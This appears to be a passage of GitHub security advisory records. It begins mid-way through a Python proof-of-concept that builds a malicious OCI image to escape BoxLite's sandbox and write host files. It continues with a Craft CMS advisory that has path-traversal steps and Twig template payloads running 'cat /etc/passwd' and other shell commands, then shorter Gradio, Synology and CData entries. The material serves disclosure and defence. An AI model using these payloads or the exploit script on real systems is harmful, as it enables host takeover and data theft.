write_blob(manifest_bytes)\n   \n       with open(os.path.join(out_dir, \"index.json\"), \"w\") as f:\n           json.dump(\n               {\n                   \"schemaVersion\": 2,\n                   \"manifests\": [\n                       {\n                           \"mediaType\": \"application/vnd.oci.image.manifest.v1+json\",\n                           \"digest\": f\"sha256:{mf_dgst}\",\n                           \"size\": mf_sz,\n                           \"annotations\": {\"org.opencontainers.image.ref.name\": \"latest\"},\n                       }\n                   ],\n               },\n               f,\n           )\n   \n       with open(os.path.join(out_dir, \"oci-layout\"), \"w\") as f:\n           json.dump({\"imageLayoutVersion\": \"1.0.0\"}, f)\n   \n       print(f\"  layer    sha256:{layer_dgst[:16]}\u2026  ({layer_sz} B)\")\n       print(f\"  config   sha256:{cfg_dgst[:16]}\u2026  ({cfg_sz} B)\")\n       print(f\"  manifest sha256:{mf_dgst[:16]}\u2026  ({mf_sz} B)\")\n   \n   \n   # \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n   \n   \n   async def main():\n       print(\"=\" * 60)\n       print(\"  PoC: BoxLite OCI Layer Extraction Symlink Escape\")\n       print(\"=\" * 60)\n   \n       # Clean up previous run artifacts\n       for path in [TARGET_FILE, \"/tmp/boxlite_host_escape\", OCI_LAYOUT_DIR]:\n           if os.path.isfile(path):\n               os.remove(path)\n           elif os.path.isdir(path):\n               shutil.rmtree(path)\n   \n       # [1] Build malicious OCI image\n       print(f\"\\n[1] Building malicious OCI image \u2192 {OCI_LAYOUT_DIR}\")\n       build_oci_layout(OCI_LAYOUT_DIR)\n   \n       # [2] Show crafted tar entries\n       print(\"\\n[2] Malicious layer tar entries:\")\n       with open(os.path.join(OCI_LAYOUT_DIR, \"index.json\")) as f:\n           idx = json.load(f)\n       mf_dgst = idx[\"manifests\"][0][\"digest\"].split(\":\")[1]\n       with open(os.path.join(OCI_LAYOUT_DIR, \"blobs\", \"sha256\", mf_dgst)) as f:\n           mf = json.load(f)\n       lyr_dgst = mf[\"layers\"][0][\"digest\"].split(\":\")[1]\n       lyr_data = open(\n           os.path.join(OCI_LAYOUT_DIR, \"blobs\", \"sha256\", lyr_dgst), \"rb\"\n       ).read()\n       with tarfile.open(fileobj=io.BytesIO(lyr_data)) as tf:\n           for m in tf.getmembers():\n               tstr = {\n                   tarfile.REGTYPE: \"FILE   \",\n                   tarfile.SYMTYPE: \"SYMLINK\",\n                   tarfile.DIRTYPE: \"DIR    \",\n               }.get(m.type, f\"?{m.type}   \")\n               suffix = f\" -\u003e {m.linkname}\" if m.issym() else \"\"\n               print(f\"    {tstr}  {m.name}{suffix}\")\n   \n       # [3] Confirm target absent before exploit\n       print(f\"\\n[3] Pre-exploit \u2014 target exists? {os.path.exists(TARGET_FILE)}\")\n   \n       # [4] Trigger extraction (vulnerability fires before VM starts)\n       print(f\"\\n[4] Loading malicious image via boxlite.SimpleBox(rootfs_path=\u2026)\")\n       import boxlite\n   \n       try:\n           async with boxlite.SimpleBox(rootfs_path=OCI_LAYOUT_DIR) as box:\n               r = await box.exec(\"sh\", \"-c\", \"echo ok\")\n               print(f\"    VM stdout: {r.stdout.strip()}\")\n       except Exception as e:\n           # Box may fail to start (incomplete rootfs) \u2014 that\u0027s fine;\n           # the symlink escape occurs during layer extraction, before VM launch.\n           print(f\"    Box error (expected): {type(e).__name__}: {e}\")\n   \n       # [5] Verify host write\n       print(f\"\\n[5] Post-exploit \u2014 target exists? {os.path.exists(TARGET_FILE)}\")\n       if os.path.exists(TARGET_FILE):\n           print(f\"\\n  VULNERABLE \u2014 host file written successfully!\")\n           print(f\"  Path: {TARGET_FILE}\")\n           print(open(TARGET_FILE).read())\n       else:\n           print(\"\\n  NOT VULNERABLE (or already patched)\")\n   \n   \n   if __name__ == \"__main__\":\n       asyncio.run(main())\n   ```\n\n   This script constructs a malicious OCI image and passes it to the SimpleBox function via rootfs_path to create a container. In the malicious image, a symlink is first created pointing `escape` to `/tmp`, and then files are written under `escape`, thereby achieving file writes to the root filesystem.\n\n   Sample output:\n\n   ```\n   $ python3 poc_symlink_escape.py\n   ============================================================\n     PoC: BoxLite OCI Layer Extraction Symlink Escape\n   ============================================================\n   \n   [1] Building malicious OCI image \u2192 /tmp/malicious_oci_layout\n     layer    sha256:a1e8b4de11d64fce\u2026  (10240 B)\n     config   sha256:8e245c2c65565998\u2026  (191 B)\n     manifest sha256:2dad6671e78d8093\u2026  (415 B)\n   \n   [2] Malicious layer tar entries:\n       SYMLINK  escape -\u003e /tmp\n       DIR      escape/boxlite_host_escape\n       FILE     escape/boxlite_host_escape/pwned.txt\n       FILE     etc/os-release\n   \n   [3] Pre-exploit \u2014 target exists? False\n   \n   [4] Loading malicious image via boxlite.SimpleBox(rootfs_path=\u2026)\n       Box error (expected): RuntimeError: internal error: Container init failed: Failed to start container: internal error: Failed to create container b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54 at bundle /run/boxlite/containers/b673b4e3400c71bd72464c98610c952e2164f70f946873b82adf3e6212851d54: failed to create container: exec process failed with error error in executing process : PATH environment variable is not set\n   \n   [5] Post-exploit \u2014 target exists? True\n   \n     VULNERABLE \u2014 host file written successfully!\n     Path: /tmp/boxlite_host_escape/pwned.txt\n   ===== BOXLITE SYMLINK ESCAPE: HOST FILESYSTEM WRITE =====\n   Written at: ...\n   Target: /tmp/boxlite_host_escape/pwned.txt\n   ========================================================\n   ```\n\n   \n\n#### Impact\n\nAn attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host.\n\n\n\n#### Score\n\nSeverity: Critical, Score: 9.7, rationale as follows:\n\n- AV:N \u2014 The attacker can distribute the malicious image over the network, tricking users into pulling and using it\n- AC:L \u2014 This is a logic vulnerability that requires no complex exploitation\n- PR:N \u2014 The attacker does not need any additional privileges to exploit this vulnerability\n- UI:R \u2014 The attacker needs to trick the victim into using the maliciously crafted image\n- S:C \u2014 The attacker can leverage the vulnerability to achieve arbitrary command execution on the host, extending the impact to the host operating system and crossing the security boundary\n- C:H/I:H/A:H \u2014 The attacker can leverage the vulnerability to gain RCE capability on the host, posing a significant threat to confidentiality, integrity, and availability\n\n\n\n#### Credit\n\nThis vulnerability was discovered by:\n\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nCVE and credit are preferred.\n\nIf you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.\n\n\n\n#### Note\n\nNote that we follow the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that we reserve the right to disclose the details of the vulnerability 30 days after the fix has been implemented.",
  "id": "GHSA-f396-4rp4-7v2j",
  "modified": "2026-06-12T19:27:40Z",
  "published": "2026-05-21T21:54:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-f396-4rp4-7v2j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46703"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/boxlite-ai/boxlite"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/releases/tag/v0.9.0"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0148.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Boxlite: Path Traversal Vulnerability Leads to Arbitrary File Write on the Host"
}

GHSA-F3CW-HG6R-CHFV

Vulnerability from github – Published: 2024-11-13 14:16 – Updated: 2025-07-16 21:01
VLAI
Summary
Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization & Twig SSTI
Details

Summary

Missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI.

(Post-authentication, ALLOW_ADMIN_CHANGES=true)

Details

Note: This is a sequel to CVE-2023-40035

In src/helpers/FileHelper.php#L106-L137, the function absolutePath returned $from . $ds . $to without path normalization:

/**
 * Returns an absolute path based on a source location or the current working directory.
 *
 * @param string $to The target path.
 * @param string|null $from The source location. Defaults to the current working directory.
 * @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.
 * @return string
 * @since 4.3.5
 */
public static function absolutePath(
    string $to,
    ?string $from = null,
    string $ds = DIRECTORY_SEPARATOR,
): string {
    $to = static::normalizePath($to, $ds);

    // Already absolute?
    if (
        str_starts_with($to, $ds) ||
        preg_match(sprintf('/^[A-Z]:%s/', preg_quote($ds, '/')), $to)
    ) {
        return $to;
    }

    if ($from === null) {
        $from = FileHelper::normalizePath(getcwd(), $ds);
    } else {
        $from = static::absolutePath($from, ds: $ds);
    }

    return $from . $ds . $to;
}

This could leads to multiple security risks, one of them is in src/services/Security.php#L201-L220 where ../templates/poc is not considered a system dir.

Let's see what happens after calling isSystemDir("../templates/poc"):

/**
 * Returns whether the given file path is located within or above any system directories.
 *
 * @param string $path
 * @return bool
 * @since 5.4.2
 */
public function isSystemDir(string $path): bool // $path = "../templates/poc"
{
    $path = FileHelper::absolutePath($path, '/'); // $path = "/var/www/html/web//../templates/poc"

    foreach (Craft::$app->getPath()->getSystemPaths() as $dir) {
        $dir = FileHelper::absolutePath($dir, '/'); // $dir = "/var/www/html/templates"
        if (str_starts_with("$path/", "$dir/") || str_starts_with("$dir/", "$path/")) { // if (false || false)
            return true;
        }
    }

    return false; // We're here!
}

Now that the path ../templates/poc can bypass isSystemDir, it will also bypass the function validatePath in src/fs/Local.php#L124-L136:

/**
 * @param string $attribute
 * @param array|null $params
 * @param InlineValidator $validator
 * @return void
 * @since 4.4.6
 */
public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
{
    if (Craft::$app->getSecurity()->isSystemDir($this->getRootPath())) {
        $validator->addError($this, $attribute, Craft::t('app', 'Local filesystems cannot be located within or above system directories.'));
    }
}

We can now create a Local filesystem within the system directories, particularly in /var/www/html/templates/poc

Then create a new asset volume with that filesystem, upload a poc.ttml file with twig code and execute using a new route with template path poc/poc.ttml

Although craftcms does sandbox twig ssti, the list in src/web/twig/Extension.php#L180-L268 is still incomplete.

{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}

These payloads still work, see twigphp/Twig/src/Extension/CoreExtension.php#getFilters() and twigphp/Twig/src/Extension/CoreExtension.php#getOperators() for more informations.

PoC

  1. Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start
mkdir craftcms && cd craftcms
ddev config --project-type=craftcms --docroot=web --create-docroot
ddev composer create -y --no-scripts "craftcms/craft"
ddev craft install
php craft setup/security-key
ddev start

start

  1. Create a new filesystem with base path ../templates/poc

filesystem

Notice that the poc directory was created

dir

  1. Create a new asset volume using the poc filesystem

asset

Upload a poc.ttml file with RCE template code

{{'<pre>'}}
{{ 8*8 }}
{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}

Note: find was added to twig last month. If you're running this poc on an older version of twig try removing the last 2 lines.

upload

ttml

  1. Create a new route * with template poc/poc.ttml

route

  1. This leads to Remote Code Execution on arbitrary route /*

rce

Remediation

diff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php
index 0c2da884a7..ac23ce556a 100644
--- a/src/helpers/FileHelper.php
+++ b/src/helpers/FileHelper.php
@@ -133,7 +133,7 @@ class FileHelper extends \yii\helpers\FileHelper
             $from = static::absolutePath($from, ds: $ds);
         }

-        return $from . $ds . $to;
+        return FileHelper::normalizePath($from . $ds . $to);
     }

     /**

fix_norm

See twigphp/Twig/src/Extension/CoreExtension.php for updated filters and operators, a possible fix could look like:

diff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php
index efff2d2412..756f452f8b 100644
--- a/src/web/twig/Extension.php
+++ b/src/web/twig/Extension.php
@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface
             new TwigFilter('lcfirst', [$this, 'lcfirstFilter']),
             new TwigFilter('literal', [$this, 'literalFilter']),
             new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]),
+            new TwigFilter('find', [$this, 'find'], ['needs_environment' => true]),
+            new TwigFilter('has some' => ['precedence' => 20, 'class' => HasSomeBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
+            new TwigFilter('has every' => ['precedence' => 20, 'class' => HasEveryBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
             new TwigFilter('markdown', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
             new TwigFilter('md', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
             new TwigFilter('merge', [$this, 'mergeFilter']),

fix_ssti

Impact

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.12.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.4.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-13T14:16:38Z",
    "nvd_published_at": "2024-11-13T16:15:19Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nMissing `normalizePath` in the function `FileHelper::absolutePath` could lead to Remote Code Execution on the server via twig SSTI.\n\n`(Post-authentication, ALLOW_ADMIN_CHANGES=true)`\n\n### Details\n\nNote: This is a sequel to [CVE-2023-40035](https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw)\n\nIn [`src/helpers/FileHelper.php#L106-L137`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/helpers/FileHelper.php#L106-L137), the function `absolutePath` returned `$from . $ds . $to` without path normalization:\n\n```php\n/**\n * Returns an absolute path based on a source location or the current working directory.\n *\n * @param string $to The target path.\n * @param string|null $from The source location. Defaults to the current working directory.\n * @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.\n * @return string\n * @since 4.3.5\n */\npublic static function absolutePath(\n    string $to,\n    ?string $from = null,\n    string $ds = DIRECTORY_SEPARATOR,\n): string {\n    $to = static::normalizePath($to, $ds);\n\n    // Already absolute?\n    if (\n        str_starts_with($to, $ds) ||\n        preg_match(sprintf(\u0027/^[A-Z]:%s/\u0027, preg_quote($ds, \u0027/\u0027)), $to)\n    ) {\n        return $to;\n    }\n\n    if ($from === null) {\n        $from = FileHelper::normalizePath(getcwd(), $ds);\n    } else {\n        $from = static::absolutePath($from, ds: $ds);\n    }\n\n    return $from . $ds . $to;\n}\n```\n\nThis could leads to multiple security risks, one of them is in [`src/services/Security.php#L201-L220`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/services/Security.php#L201-L220) where `../templates/poc` is not considered a system dir.\n\nLet\u0027s see what happens after calling `isSystemDir(\"../templates/poc\")`:\n\n```php\n/**\n * Returns whether the given file path is located within or above any system directories.\n *\n * @param string $path\n * @return bool\n * @since 5.4.2\n */\npublic function isSystemDir(string $path): bool // $path = \"../templates/poc\"\n{\n    $path = FileHelper::absolutePath($path, \u0027/\u0027); // $path = \"/var/www/html/web//../templates/poc\"\n\n    foreach (Craft::$app-\u003egetPath()-\u003egetSystemPaths() as $dir) {\n        $dir = FileHelper::absolutePath($dir, \u0027/\u0027); // $dir = \"/var/www/html/templates\"\n        if (str_starts_with(\"$path/\", \"$dir/\") || str_starts_with(\"$dir/\", \"$path/\")) { // if (false || false)\n            return true;\n        }\n    }\n\n    return false; // We\u0027re here!\n}\n```\n\nNow that the path `../templates/poc` can bypass `isSystemDir`, it will also bypass the function `validatePath` in [`src/fs/Local.php#L124-L136`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/fs/Local.php#L124-L136):\n```php\n/**\n * @param string $attribute\n * @param array|null $params\n * @param InlineValidator $validator\n * @return void\n * @since 4.4.6\n */\npublic function validatePath(string $attribute, ?array $params, InlineValidator $validator): void\n{\n    if (Craft::$app-\u003egetSecurity()-\u003eisSystemDir($this-\u003egetRootPath())) {\n        $validator-\u003eaddError($this, $attribute, Craft::t(\u0027app\u0027, \u0027Local filesystems cannot be located within or above system directories.\u0027));\n    }\n}\n```\n\nWe can now create a Local filesystem within the system directories, particularly in `/var/www/html/templates/poc`\n\nThen create a new asset volume with that filesystem, upload a `poc.ttml` file with twig code and execute using a new route with template path `poc/poc.ttml`\n\nAlthough craftcms does sandbox twig ssti, the list in [src/web/twig/Extension.php#L180-L268](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/web/twig/Extension.php#L180-L268) is still incomplete.\n\n\n```js\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nThese payloads still work, see [twigphp/Twig/src/Extension/CoreExtension.php#getFilters()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L196-L247) and [twigphp/Twig/src/Extension/CoreExtension.php#getOperators()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L291-L333) for more informations.\n\n### PoC\n\n1. Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start\n\n```sh\nmkdir craftcms \u0026\u0026 cd craftcms\nddev config --project-type=craftcms --docroot=web --create-docroot\nddev composer create -y --no-scripts \"craftcms/craft\"\nddev craft install\nphp craft setup/security-key\nddev start\n```\n\n\u003cimg width=\"1280\" alt=\"start\" src=\"https://github.com/user-attachments/assets/f8bcc22a-6ffd-40a5-81c6-c077fa4ce1d3\"\u003e\n\n2. Create a new filesystem with base path `../templates/poc`\n\n\u003cimg width=\"1280\" alt=\"filesystem\" src=\"https://github.com/user-attachments/assets/fe78e023-bd51-4fc1-a22e-dcfa5baf266b\"\u003e\n\nNotice that the `poc` directory was created\n\n\u003cimg width=\"167\" alt=\"dir\" src=\"https://github.com/user-attachments/assets/ccc45ce8-8555-4aae-ae48-320a630e7d79\"\u003e\n\n3. Create a new asset volume using the `poc` filesystem\n\n\u003cimg width=\"1280\" alt=\"asset\" src=\"https://github.com/user-attachments/assets/b5530766-11b4-4e45-ae58-82f81fc2db00\"\u003e\n\nUpload a `poc.ttml` file with RCE template code\n\n```js\n{{\u0027\u003cpre\u003e\u0027}}\n{{ 8*8 }}\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nNote: `find` was added to twig [last month](https://github.com/twigphp/Twig/commit/4e262511930e408e4c7eda07b1c977f2ea98575c). If you\u0027re running this poc on an older version of twig try removing the last 2 lines.\n\n\u003cimg width=\"1280\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/63e65beb-2ede-4141-85d2-e7d21cd4b8ad\"\u003e\n\n![ttml](https://github.com/user-attachments/assets/9db8ca9b-25eb-4014-a7f5-4ece895b106d)\n\n4. Create a new route `*` with template `poc/poc.ttml`\n\n\u003cimg width=\"1280\" alt=\"route\" src=\"https://github.com/user-attachments/assets/b92d9340-b6a5-40d8-a8e8-ddab5cfc9f21\"\u003e\n\n5. This leads to Remote Code Execution on arbitrary route `/*`\n\n\u003cimg width=\"454\" alt=\"rce\" src=\"https://github.com/user-attachments/assets/19765f6c-1c28-4a0b-a89c-25f6f05ceca6\"\u003e\n\n### Remediation\n\n```diff\ndiff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php\nindex 0c2da884a7..ac23ce556a 100644\n--- a/src/helpers/FileHelper.php\n+++ b/src/helpers/FileHelper.php\n@@ -133,7 +133,7 @@ class FileHelper extends \\yii\\helpers\\FileHelper\n             $from = static::absolutePath($from, ds: $ds);\n         }\n\n-        return $from . $ds . $to;\n+        return FileHelper::normalizePath($from . $ds . $to);\n     }\n\n     /**\n```\n\n![fix_norm](https://github.com/user-attachments/assets/4c8e5b4f-6216-416c-87a1-9b9fae033971)\n\nSee [twigphp/Twig/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php) for updated filters and operators, a possible fix could look like:\n\n```diff\ndiff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php\nindex efff2d2412..756f452f8b 100644\n--- a/src/web/twig/Extension.php\n+++ b/src/web/twig/Extension.php\n@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface\n             new TwigFilter(\u0027lcfirst\u0027, [$this, \u0027lcfirstFilter\u0027]),\n             new TwigFilter(\u0027literal\u0027, [$this, \u0027literalFilter\u0027]),\n             new TwigFilter(\u0027map\u0027, [$this, \u0027mapFilter\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+            new TwigFilter(\u0027find\u0027, [$this, \u0027find\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+            new TwigFilter(\u0027has some\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasSomeBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n+            new TwigFilter(\u0027has every\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasEveryBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n             new TwigFilter(\u0027markdown\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n             new TwigFilter(\u0027md\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n             new TwigFilter(\u0027merge\u0027, [$this, \u0027mergeFilter\u0027]),\n```\n\n![fix_ssti](https://github.com/user-attachments/assets/5d9ce9be-022b-4853-a5f9-688b247cc27c)\n\n### Impact\n\nTake control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.\n\nAlthough the vulnerability is exploitable only in the authenticated users, configuration with `ALLOW_ADMIN_CHANGES=true`, there is still a potential security threat (Remote Code Execution)",
  "id": "GHSA-f3cw-hg6r-chfv",
  "modified": "2025-07-16T21:01:41Z",
  "published": "2024-11-13T14:16:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52293"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization \u0026 Twig SSTI"
}

GHSA-F3GR-2WRV-HWPX

Vulnerability from github – Published: 2025-02-13 09:31 – Updated: 2025-02-13 09:31
VLAI
Details

Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in agent-related functionality in Synology Active Backup for Business before 2.7.1-13234, 2.7.1-23234 and 2.7.1-3234 allows remote authenticated users with administrator privileges to delete arbitrary files via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47264"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-13T07:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Improper limitation of a pathname to a restricted directory (\u0027Path Traversal\u0027) vulnerability in agent-related functionality in Synology Active Backup for Business before 2.7.1-13234, 2.7.1-23234 and 2.7.1-3234 allows remote authenticated users with administrator privileges to delete arbitrary files via unspecified vectors.",
  "id": "GHSA-f3gr-2wrv-hwpx",
  "modified": "2025-02-13T09:31:25Z",
  "published": "2025-02-13T09:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47264"
    },
    {
      "type": "WEB",
      "url": "https://www.synology.com/en-global/security/advisory/Synology_SA_25_02"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F3H9-8PHC-6GVH

Vulnerability from github – Published: 2024-02-06 00:30 – Updated: 2026-05-19 20:20
VLAI
Summary
Gradio Path Traversal vulnerability
Details

A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-0964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-06T20:25:41Z",
    "nvd_published_at": "2024-02-05T23:15:08Z",
    "severity": "HIGH"
  },
  "details": "A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.",
  "id": "GHSA-f3h9-8phc-6gvh",
  "modified": "2026-05-19T20:20:32Z",
  "published": "2024-02-06T00:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0964"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2024-261.yaml"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio Path Traversal vulnerability"
}

GHSA-F3HC-9Q6R-J846

Vulnerability from github – Published: 2024-04-05 18:30 – Updated: 2024-04-05 18:30
VLAI
Details

A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-31849"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-05T18:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.",
  "id": "GHSA-f3hc-9q6r-j846",
  "modified": "2024-04-05T18:30:35Z",
  "published": "2024-04-05T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31849"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/research/tra-2024-09"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

